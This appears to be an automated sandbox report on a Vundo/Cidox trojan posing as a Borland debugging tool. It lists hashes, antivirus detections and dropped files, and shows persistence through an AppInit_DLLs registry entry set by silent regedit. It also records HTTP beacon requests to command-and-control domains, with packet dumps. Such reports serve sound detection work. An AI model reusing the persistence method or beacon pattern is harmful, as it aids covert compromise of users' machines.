Analysis Date2015-01-16 16:46:23
MD5533f9aa2fceba82030765a65fec344c0
SHA17472334bf22a506f1da1df4352434ce09923b674

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 015a3842f0b2e26a96cf89e1bdf5fbd9 sha1: 8630261e13ebc3c05471656813bba50fed9a489b size: 90112
Section_ASM2 md5: 20729e06f7e3b8ef6eceb032d67df238 sha1: 0e9e38867edc2f4eb14cba3721e49bd4d9cd6056 size: 62464
Section.rdata md5: 7557c2785132c407c82bdf0babb3180f sha1: 9720161578a93a15a4d12ecb5c81a559a55d22d6 size: 8192
Section.data md5: 512dd8019e8386b33142bfbaa8c4782f sha1: ccc23df3ec301a3e41f4bef166119ee49abfdadf size: 5120
Section.tls md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section.rsrc md5: 0700f6ce8a5c5f57f0abb43c0bfc0e28 sha1: 013ef4a4db6e77f6a2b3b73eb17e54ab68d4b788 size: 17920
Timestamp2012-09-17 18:13:28
VersionLegalCopyright: Copyright © Borland Software Corporation 1990, 2001
InternalName: BORDBG61
FileVersion: 70.08.08.1442
CompanyName: Borland Software Corporation
ProductName: Borland Remote Debugging Server
ProductVersion: 51.00
FileDescription: Borland Remote Debugging Server
OriginalFilename: bordbg61.exe
PackerMicrosoft Visual C++ ?.?
PEhasha925dd1f335ec9e7da69cedf847344c4c965fe8d
IMPhash5b5fe4d280f8f7ea0aa9aa05e3974812
AV360 Safeno_virus
AVAd-AwareGen:Variant.Spy.5
AVAlwil (avast)Hioles-H [Trj]
AVArcabit (arcavir)Gen:Variant.Spy.5
AVAuthentiumW32/Cidox.A.gen!Eldorado
AVAvira (antivir)TR/Vundo.Gen8
AVBullGuardGen:Variant.Spy.5
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Trojan.Vundo.Gen
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftGen:Variant.Spy.5
AVEset (nod32)Win32/Citirevo.AD
AVFortinetW32/Citirevo.AB!tr
AVFrisk (f-prot)W32/Cidox.A.gen!Eldorado
AVF-SecureGen:Variant.Spy.5
AVGrisoft (avg)Win32/Cryptor
AVIkarusTrojan-Downloader.Win32.Vundo
AVK7Backdoor ( 04c4f2bf1 )
AVKasperskyTrojan.Win32.Generic
AVMalwareBytesTrojan.Agent
AVMcafeeVundo-FASV!533F9AA2FCEB
AVMicrosoft Security EssentialsTrojanDownloader:Win32/Vundo.J
AVMicroWorld (escan)Gen:Variant.Spy.5
AVRisingno_virus
AVSophosMal/Vundo-M
AVSymantecTrojan.Gen.2
AVTrend MicroTROJ_VUNDO.SMKK
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Creates FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

Process
↳ C:\WINDOWS\Explorer.EXE

RegistryHKEY_CURRENT_USER\SessionInformation\ProgramCount ➝
NULL
Creates File\Device\Afd\Endpoint
Creates FileC:\WINDOWS\system32\kimvsya.dll
Creates FileC:\Documents and Settings\Administrator\Cookies\cf
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\0105.tmp
Deletes FileC:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Creates ProcessC:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg
Winsock DNS91.233.89.106
Winsock DNSclickbeta.ru
Winsock DNSdenadb.com
Winsock DNSterrans.su
Winsock DNSnsknock.com
Winsock DNStryatdns.com
Winsock DNSclickclans.ru
Winsock DNSdenareclick.com
Winsock DNSgleospond.com
Winsock DNSfescheck.com
Winsock DNSinstrango.com
Winsock DNStegimode.com
Winsock DNSnetrovad.com
Winsock DNSnshouse1.com
Winsock DNSforadns.com
Winsock DNSgetavodes.com
Winsock DNSclickstano.com

Process
↳ C:\WINDOWS\regedit.exe /s C:\Documents and Settings\Administrator\My Documents\Iterra\T03emp03.reg

RegistryHKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows\AppInit_DLLs ➝
C:\WINDOWS\system32\kimvsya.dll\\x00

Network Details:

DNSinstrango.com
Type: A
204.11.56.45
DNSdenadb.com
Type: A
204.11.56.45
DNSforadns.com
Type: A
141.8.225.62
DNSgleospond.com
Type: A
DNSgetavodes.com
Type: A
DNStryatdns.com
Type: A
DNSfescheck.com
Type: A
DNSnetrovad.com
Type: A
DNSnsknock.com
Type: A
DNSterrans.su
Type: A
DNStegimode.com
Type: A
DNSclickstano.com
Type: A
DNSdenareclick.com
Type: A
DNSclickbeta.ru
Type: A
DNSnshouse1.com
Type: A
DNSclickclans.ru
Type: A
HTTP GEThttp://instrango.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3290&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg46nGkBy6/VTHFVCiX/vAY3OjlI45uGjkJj+jP1vVxrj
User-Agent:
HTTP GEThttp://denadb.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3290&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg46nGkBy6/VTHFVCiX/vAY3OjlI45uGjkAcXGgK7Va5i
User-Agent:
HTTP GEThttp://foradns.com/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3290&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg46nGkBy6/VTHFVCiX/vAY3OjlI45uGjkNrbrZZJEGBQ
User-Agent:
HTTP GEThttp://91.233.89.106/phpbb/get.php?id=C059900AEA75E06FXXXXXXXXXXXX0000&key=3290&av=0&vm=0&al=0&p=291&os=5.1.2600.3&z=458&hash=CvCnBjVj8IOM33A9LfOGdBknjy9aWzAJFE8Jx7rHtUT7vZ61zgWyg46nGkBy6/VTHFVCiX/vAY3OjlI45uGjkP6okJjuuXSW
User-Agent:
Flows TCP192.168.1.1:1031 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1032 ➝ 204.11.56.45:80
Flows TCP192.168.1.1:1033 ➝ 141.8.225.62:80
Flows TCP192.168.1.1:1034 ➝ 91.233.89.106:80

Raw Pcap
0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 32393026   XX0000&key=3290&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 366e476b 4279362f 56544846   Wyg46nGkBy6/VTHF
0x000000b0 (00176)   56436958 2f764159 334f6a6c 49343575   VCiX/vAY3OjlI45u
0x000000c0 (00192)   476a6b4a 6a2b6a50 31765678 726a2048   GjkJj+jP1vVxrj H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2069   TTP/1.1..Host: i
0x000000e0 (00224)   6e737472 616e676f 2e636f6d 0d0a0d0a   nstrango.com....
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 32393026   XX0000&key=3290&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 366e476b 4279362f 56544846   Wyg46nGkBy6/VTHF
0x000000b0 (00176)   56436958 2f764159 334f6a6c 49343575   VCiX/vAY3OjlI45u
0x000000c0 (00192)   476a6b41 63584767 4b375661 35692048   GjkAcXGgK7Va5i H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2064   TTP/1.1..Host: d
0x000000e0 (00224)   656e6164 622e636f 6d0d0a0d 0a0a0d0a   enadb.com.......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 32393026   XX0000&key=3290&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 366e476b 4279362f 56544846   Wyg46nGkBy6/VTHF
0x000000b0 (00176)   56436958 2f764159 334f6a6c 49343575   VCiX/vAY3OjlI45u
0x000000c0 (00192)   476a6b4e 7262725a 5a4a4547 42512048   GjkNrbrZZJEGBQ H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2066   TTP/1.1..Host: f
0x000000e0 (00224)   6f726164 6e732e63 6f6d0d0a 0d0a0d0a   oradns.com......
0x000000f0 (00240)                                         

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 32393026   XX0000&key=3290&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796734 366e476b 4279362f 56544846   Wyg46nGkBy6/VTHF
0x000000b0 (00176)   56436958 2f764159 334f6a6c 49343575   VCiX/vAY3OjlI45u
0x000000c0 (00192)   476a6b50 366f6b4a 6a757558 53572048   GjkP6okJjuuXSW H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2039   TTP/1.1..Host: 9
0x000000e0 (00224)   312e3233 332e3839 2e313036 0d0a0d0a   1.233.89.106....
0x000000f0 (00240)                                         


Strings
P
.
gQ
-
w
J
uriVttcetorlauri
\
.CC
 
.i.
k7
x>
..
Jp.vvv..
..vvv
vvvv.vv.vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv3
040904E4
1?b1X
1Cycle through the possible initial break settings9Request that the debugger resynchronize with the debuggee
1Display debugger and debuggee version information
51.00
70.08.08.1442
7Set the initial command for new command browser windows!Toggle the verbose output setting2Display the debugger time for every debuggee event1Display debugger and debuggee version information
8Configure mapping from file extension to source language
About WinDbg
Activate window
BINARY
BORDBG61
bordbg61.exe
Borland Remote Debugging Server
Borland Software Corporation
 Borland Software Corporation 1990, 2001
Cascade all floating windows&Horizontally tile all floating windows$Vertically tile all floating windows
Close all source windows-Close all windows that are error placeholders"Open a new docked window container
CompanyName
Copyright 
CWindowClass
Debug operations
Detach the current program
Display source when possibleGPerform symbol resolution for symbol strings without a module qualifier
Dock all undocked windows
FileDescription
FileVersion
                                 H
         (((((                  H
Halt the current program
Help contents and searches
         h((((                  H
*hj$
InternalName
iphapi32.dll
KERNEL32.DLL
Kernel debugging control.Cycle through the available baud rate settings
LegalCopyright
Manage event filters
Manage open windows
:Manage windows using the Multiple Document Interface styleDAutomatically open a disassembly window when source is not available
mscoree.dll
Open a command browser window
Open the command window
Open the disassembly window
Open the help index
Open the help search dialog
Open the help table of contents)Open the help for the current window type)Open help for the currently selected text
"Open the process and thread window
Open the registers window
Open the scratch pad window"Open the process and thread window
OriginalFilename
ProductName
ProductVersion
Restart the Program"Stop debugging the current program
Run the Program)Handle the exception and continue running1Do not handle the exception, but continue running
Step over the next statement Step out of the current function1Run the program to the line containing the cursor
StringFileInfo
Toggle the status bar on or off
Toggle the status bar on or off,View or edit the font for the current window
Toggle the toolbar on or off
Trace into the next statement
Translation
Undock all docked windows
VarFileInfo
View program options
View the module list
View WinDbg's command line
VS_VERSION_INFO
 Window arrangement and selection
                          
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
04ZSfcjs
0A@@Ju
0~k_iJ
|\0m(},
0r1b~RSB
0SSSSS
0tnV}DCuK
1}IcruW
}2a"3vB
2gQE[r
2>p!w5
2r*b	RiB
~'2&wV
}36H x-!"
3jEP0/
3jp{.f
*3L#-Rl
3-n&8la
3XO(WXa
|4&;|C'
;.4ggOC
[_4HSX
4n<Qg!
4%"?XPi
"(5b%r
-5gvwf}e
5$X: cFzI
5XZoRv}
)6"2bC
?'6BP)
>73\&mt
7Po,>~9
7r'bsR
7t`|#Pa
84)=s!
8G(C8RP
8G(R8_P
8G(V8OP
8hQ=Q#:t
8RichNP
^$	9=_
)9ema&1
;9:;G*z
	9q(j^	
=!}A}!=
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
ADVAPI32.dll
&AE_<q'v[
$AFmoZ
An application has made an attempt to load the C runtime library incorrectly.
ap2"AQ6v
(aQBh^l
`_ASM2
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
[{ b8/
bAJSBlVubM
(B)%<aL
B{:  b
BcPlM|]
BD*}^]
BeginPaint
BERw g0j
	Be`Va
BGT'O(8=
BIRYbz
B->K!zqhg;kx"K2Z
b,"L",b
b,"L",B,b,
bO4Q3n
B(&ob	%Ho	b
B(&|R8r
B]RMb}
B(S9c	s
	BTl)bt
Bu",|T
BY INSTALLING AND USING THIS SOFTWARE, YOU ARE CONSENTING TO BE BOUND BY AND ARE BECOMING A PARTY TO THIS AGREEMENT. IF YOU DO NOT AGREE TO ALL OF THE TERMS OF THIS AGREEMENT, CLICK THE "CANCEL" BUTTON AND THE INSTALLATION PROCESS WILL NOT CONTINUE. IF THESE TERMS ARE CONSIDERED AN OFFER, ACCEPTANCE IS EXPRESSLY LIMITED TO THESE TERMS. 
c	6?,A
CloseHandle
CorExitProcess
CreateBitmap
Created and produced by Whole Tomato, Inc., 1733 Fessler St., Englewood, FL, USA, (408) 323-1590, info@wholetomato.com, www.wholetomato.com.
CreateWindowExA
- CRT not initialized
@.data
DDDDDDDD
dddd, MMMM dd, yyyy
<.?dDY
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DestroyWindow
DeviceIoControl
DISCLAIMER OF WARRANTY. THE SOFTWARE, AND ANY SERVICES THAT YOU RECEIVE FROM WHOLE TOMATO ARE PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND. WHOLE TOMATO HEREBY DISCLAIMS ALL EXPRESS OR IMPLIED WARRANTIES, INCLUDING WITHOUT LIMITATION WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE, AND NON-INFRINGEMENT. THIS DISCLAIMER OF WARRANTY CONSTITUTES AN ESSENTIAL PART OF THIS AGREEMENT. SOME STATES DO NOT ALLOW EXCLUSIONS OF AN IMPLIED WARRANTY, SO THIS DISCLAIMER MAY NOT APPLY TO YOU AND YOU MAY HAVE OTHER LEGAL RIGHTS THAT VARY FROM STATE TO STATE OR BY JURISDICTION. 
DispatchMessageA
d.ntC7#B
DOMAIN error
DrawTextA
D\RSRc
dW~J#Zp
}DYF$"
DzsRcB
*E3E?r<
E4!(9:R
e*N0Enh
EncodePointer
EndPaint
EnterCriticalSection
Eo.7TSe?
Ep(Amgr7
`EPzO*Y2 
EWUjZTJ
ExitProcess
EXPORT CONTROLS. You shall comply with all export laws and restrictions and regulations of the Department of Commerce, the United States Department of Treasury Office of Foreign Assets Control ("OFAC"), or other United States or foreign agency or authority, and not to export, or allow the export or re-export of the Software in violation of any such restrictions, laws or regulations (including, without limitation, export or re-export to destinations prohibited either in Country Groups Q, S, W, Y or Z country specified in the then current Supplement No. 1 to Section 770 of the U.S. Export Administration Regulations (or any successor supplement or regulations), or the OFAC regulations found at 31 C.F.R. 500 et seq.). By installing or using the Software, you are agreeing to the foregoing and you are representing and warranting that you are not located in, under the control of, or a national or resident of any restricted country or on any such list. 
F0oEfZ
F0v$|Y6I
<'&F5s3#
&FD;g;
February
=FFJq$
FindWindowA
F	J?hn
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FR5"&s
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
F~Yu4a
?<g?1d 
'g3%zr
GDI32.dll
GetACP
GetActiveWindow
GetClientRect
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersion
GRANT. Subject to the terms of this Agreement, Whole Tomato Software, Inc. ("Whole Tomato") hereby grants you a limited, personal, nontransferable, nonsublicensable, royalty-free, nonexclusive license to use one copy of the client software product you are about to install in object code form ("Software"). You may copy the Software for archival purposes, provided any copy must contain all of the original Software's proprietary notices. 
GVqNt{Gg2p
gWf"\`Lg
/`-gWM
gZYTBJ4f
haxFdKX
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
HH:mm:ss
hJ	\uh\
Hs_cnS~C
HsXcoS~C
i/9>)e
[I"Aad
iFe8uf
(iHyhIHY
I?,JJJz
i;M I>
iN@g66
I`NhKJ\ss
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
-iRVbmvlN
IsDebuggerPresent
IsValidCodePage
j0jMZF
JanFebMarAprMayJunJulAugSepOctNovDec
January
jFmJa 
j@j ^V
JJztu7
JM*Mj-J-J
JsecUSEC53$#
jszcJS
jszcJSZC*3:#
JsZcUSEC53%#
j"Vj-j
;j= z/
KERNEL32.dll
KH_kop
kL{[Kh
k,}LwQ
Kr#Our
Last modified: May 9, 2012
LCMapStringA
LCMapStringW
LeaveCriticalSection
LIMITATION OF LIABILITY. You assume the entire risk as to the quality and performance of the Software. Whole Tomato assumes no liability for the cost of any service or repair if the Software is defective 
LoadAcceleratorsA
LoadCursorA
LoadIconA
LoadLibraryA
LoadStringA
Lr_	+y?"
lstrcmpiA
l&X!0Oj
l!=YIR
m9-Y-9m
*mb3m+
MessageBoxA
Microsoft Visual C++ Runtime Library
MISCELLANEOUS. This Agreement represents the complete agreement concerning this license between the parties and supersedes all prior agreements and representations between them. It may be amended only by a writing executed by both parties. If any provision of this Agreement is held to be unenforceable for any reason, such provision shall be reformed only to the extent necessary to make it enforceable. This Agreement shall be governed by and construed under California law as such law applies to agreements between California residents entered into and to be performed within California. 
%MKZLrljL
MM/dd/yy
Monday
M|PLp\P,0<P
	MSC(%
mu`)|&l
MultiByteToWideChar
*MU|Y(M
Ncu);MP
NgHt5R
<:N{j6qBz
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
:#&O_&
 O0k&s
October
OH_@oQ
oHXD;m
<O,oY'
OR_~o<
OUrnn1R
 o,ZJ0
~:P+@+
P\aFg?rC
pbW}EnU2
p;]ch	
Please contact the application's support team for more information.
p[mw]sWCS34
PPPPPPPP
;	`pQd
Program: 
<program name unknown>
- pure virtual function call
p#-W9,
?PyHmI5
	q0p jbQI;o
@*Q8b,r
Q!a1~7
Q;ArqR;
:q:foZ
q!-TOGB>T
QueryPerformanceCounter
QV"H2X
?r.bSR/B
rCb3R#B
rCbsRcB
`.rdata
R'@D)k
r}E-c%C
Rectangle
RegConnectRegistryA
RegisterClassExA
RegOpenKeyExA
RekuV1
rFQ36f=V
:rIbAR
;R_ioX
( [ |rjL$}
rQK6'J
RsAcqSaC
RtlUnwind
Ru"erU
runtime error 
Runtime Error!
Rzb"_fo,<
s2X1WQ
Saturday
sBHb!S0
sC&K,Z
September
SetHandleCount
SetLastError
SetParent
SetUnhandledExceptionFilter
ShowWindow
SING error
S'j gZ
SOFTWARE LICENSE AGREEMENT
Sr0bS+
SrCbsRc:
SrCbsRcB
strcat
Sunday
SunMonTueWedThuFriSat
{T3;;j
<t<|D^
TerminateProcess
TERMINATION. Whole Tomato may, at its sole discretion, terminate this Agreement, the license granted herein, and your right to use or access the Software at any time. On termination, you must destroy all copies of the Software. 
TextOutA
t$h4xB
The Software may be installed on more than one computer provided that you are the exclusive user of the Software. As used in this context, "you" shall be defined as an individual human person.
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
This Software is protected by both the United States copyright laws and international copyright treaty provisions. You must treat the Software like any other copyrighted material -- for example, a book, except that you may copy it onto a computer to be used and you may make archival copies of the Software for the sole purpose of backing-up our Software and protecting your investment from loss. 
Thursday
TITLE. As between the parties, title, ownership rights, and intellectual property rights in and to the Software, and any copies or portions thereof, shall remain in Whole Tomato and its suppliers or licensors. The Software is protected by the copyright laws of the United States and international copyright treaties. Title, ownership rights, and intellectual property rights in and to any software, data, information, text, pictures, images, or other content ("Content") accessed through the Software or otherwise is the property of the applicable owner and may be protected by applicable copyright or other law. This License gives you no rights, title, or interest to Content (including without limitation Content that you create using the Software). 
$t	jpY
TKJzBj
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
(t]++O
tQZlHV'Q
TranslateAcceleratorA
TranslateMessage
t"SS9]
t$<"u	3
Tuesday
t,USSVh
;t$,v-
tVGe-A
t+WWVPV
U[ ?'/
	{ua+?
/Uf.Yv
uLK#7m
- unable to initialize heap
- unable to open console device
UNDER NO CIRCUMSTANCES AND UNDER NO LEGAL THEORY, TORT, CONTRACT, STRICT LIABILITY, OR OTHERWISE, SHALL WHOLE TOMATO OR ITS LICENSORS, SUPPLIERS OR RESELLERS BE LIABLE TO YOU OR ANY OTHER PERSON FOR ANY INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES OF ANY CHARACTER INCLUDING, WITHOUT LIMITATION, DAMAGES FOR LOST PROFITS, LOSS OF GOODWILL, WORK STOPPAGE, COMPUTER FAILURE OR MALFUNCTION, OR ANY AND ALL OTHER COMMERCIAL DAMAGES OR LOSSES. IN NO EVENT WILL WHOLE TOMATO BE LIABLE FOR ANY DAMAGES IN EXCESS OF WHOLE TOMATO'S LIST PRICE FOR A LICENSE TO THE SOFTWARE, EVEN IF WHOLE TOMATO SHALL HAVE BEEN INFORMED OF THE POSSIBILITY OF SUCH DAMAGES, OR FOR ANY CLAIM BY ANY OTHER PARTY. THIS LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE, SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO YOU. 
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UpdateWindow
_u"QkQR
UQPXY]Y[
ur1:nEZ
URPQQh
USER32.dll
USER32.DLL
U.S. GOVERNMENT RESTRICTED RIGHTS. Use, duplication or disclosure by the Government is subject to restrictions set forth in subparagraphs (a) through (d) of the Commercial Computer-Restricted Rights clause at FAR 52.227-19 when applicable, or in subparagraph (c) (1) (ii) of the Rights in Technical Data and Computer Software clause in DFARS 252.227-7013, and in similar clauses in the NASA FAR Supplement. 
UwZ]*3P
uZgEW(
)uZG}k?^"FZ
U!z-UF
v1bUF~."]
v"i(l'J
VirtualAlloc
VirtualFree
v}:m>~Z0
v	N+D$
:}#vxV
};W'7'
Wednesday
W<g,~A
WideCharToMultiByte
-^WJ5k
W:L6b(p
WP}M,^
WriteFile
=w $|S
WSe!w{d
wwwwwwwwwww
?X7'"b
XhC<7'
X>HIM[)@r
Xl uEB
`xp@6@P
Y	\3Z)
y9iYYyIY
:yJgEgu=e
|y(nk0
You may not, directly or indirectly: modify, translate, reverse engineer, decompile, disassemble (except to the extent applicable laws specifically prohibit such restriction), create derivative works based on, or otherwise attempt to discover the source code or underlying ideas or algorithms of the Software; or copy (except for archival purposes as set forth above), rent, lease, distribute, transfer or otherwise transfer rights to the Software; use the Software for timesharing or service bureau purposes; or remove any proprietary notices or labels on the Software. 
y~So?Tbz
>=Yt1j
<+Y/Yg
Z :Bzzj
|zcLY\
}z]+GWAf
Z=j-z]
ZPn3.#(,
z&Rj2^
ZU\KV~+
>zZK^3